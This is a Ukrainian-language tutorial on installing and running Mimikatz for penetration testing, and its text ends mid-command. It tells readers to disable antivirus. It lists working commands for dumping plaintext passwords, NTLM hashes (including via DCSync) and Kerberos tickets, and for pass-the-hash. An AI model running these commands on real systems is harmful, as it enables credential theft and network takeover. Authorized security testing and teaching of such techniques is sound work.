Вступ

Mimikatz – це потужний інструмент пост-експлуатації, призначений для вилучення з пам’яті відкритих паролів, хешів, PIN-кодів і квитків Kerberos. Він широко використовується тестувальниками проникнення і фахівцями з безпеки для оцінки вразливостей систем. Цей посібник надає покроковий підхід до встановлення та використання Mimikatz для етичного тестування безпеки.

Попередження: Несанкціоноване використання Mimikatz є незаконним. Переконайтеся, що у вас є дозвіл, перш ніж використовувати його в будь-якому середовищі.

Необхідні умови

Перед встановленням Mimikatz переконайтеся, що у вас є наступне:

  • Комп’ютер з Windows(Windows 7 , 10, 11 або Server версії)
  • Привілеї адміністратора
  • Захисник Windows та будь-яке антивірусне програмне забезпечення вимкнено (Mimikatz часто позначається як шкідливе програмне забезпечення)

Завантаження Mimikatz

Mimikatz – це інструмент з відкритим вихідним кодом, доступний на GitHub. Щоб завантажити його:

  1. Відкрийте веб-браузер і перейдіть на https://github.com/gentilkiwi/mimikatz.
  2. Натисніть ” Код ” > ” Завантажити ZIP“.
  3. Розпакуйте ZIP-архів до обраної вами папки.

Крім того, ви можете клонувати сховище за допомогою Git’а:

 git clone https://github.com/gentilkiwi/mimikatz.git

Запуск Mimikatz

Оскільки Mimikatz вимагає адміністративних привілеїв, виконайте ці кроки, щоб запустити його:

  1. Відкрийте командний рядок або PowerShell від імені адміністратора.
  2. Перейдіть до папки, з якої ви розпакували Mimikatz:
    cd шлях\до\mimikatz\x64
  3. Запустіть Mimikatz:
    mimikatz.exe
  4. Ви повинні побачити інтерфейс командного рядка з запрошенням mimikatz #.

Основні команди Mimikatz

1. Перевірка системних привілеїв

Перш ніж витягувати облікові дані, перевірте, чи маєте ви достатні привілеї:

privilege::debug

Якщо все пройшло успішно, ви повинні побачити Привілей '20' OK

2. Вилучення паролів з пам’яті

Щоб витягти паролі з пам’яті у вигляді відкритого тексту, скористайтеся:

sekurlsa::logonpasswords

На екран буде виведено ім’я користувача, домен і паролі у відкритому вигляді, якщо вони доступні.

3. Дамп хешів NTLM

Хеші NTLM можуть бути використані для атак типу “перехоплення хешу”. Щоб витягти їх, виконайте:

lsadump::sam

Або, для віддалених систем:

lsadump::dcsync /domain:targetdomain.com /user:Administrator

4. Витяг квитків Kerberos

Для отримання квитків Kerberos з системи:

sekurlsa::tickets /export

Експортує файли .kirbi, які можуть бути використані в атаках типу pass-the-ticket.

5. Pass-the-Hash атака

Для автентифікації за допомогою NTLM хешу замість пароля:

sekurlsa::pth /user:Administrator /domain:example.com /ntlm: